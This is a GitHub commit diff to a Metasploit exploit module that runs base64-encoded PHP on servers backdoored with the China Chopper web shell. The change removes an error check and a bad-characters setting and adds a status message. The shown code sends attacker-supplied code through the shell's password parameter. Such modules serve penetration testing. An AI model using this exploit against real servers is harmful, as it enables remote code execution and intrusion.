Skip to content

Commit 27be832

Browse files
committed
remove the fail_with because it's always triggering anyway
1 parent 109e9b6 commit 27be832

File tree

1 file changed

+2
-9
lines changed

1 file changed

+2
-9
lines changed

modules/exploits/multi/http/caidao_php_backdoor_exec.rb

Lines changed: 2 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -24,10 +24,6 @@ def initialize(info = {})
2424
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
2525
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
2626
],
27-
'Payload' =>
28-
{
29-
'BadChars' => '\x00'
30-
},
3127
'Platform' => ['php'],
3228
'Arch' => ARCH_PHP,
3329
'Targets' =>
@@ -47,17 +43,13 @@ def initialize(info = {})
4743

4844
def http_send_command(code)
4945
code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
50-
res = send_request_cgi({
46+
send_request_cgi({
5147
'method' => 'POST',
5248
'uri' => normalize_uri(target_uri.path),
5349
'vars_post' => {
5450
"#{datastore['PASSWORD']}" => code
5551
}
5652
})
57-
unless res && res.code == 200
58-
fail_with(Failure::Unknown, 'Failed to execute the code.')
59-
end
60-
res
6153
end
6254

6355
def check
@@ -71,6 +63,7 @@ def check
7163
end
7264

7365
def exploit
66+
print_status("#{peer} - Sending exploit...")
7467
http_send_command(payload.raw)
7568
end
7669
end

0 commit comments

Comments
 (0)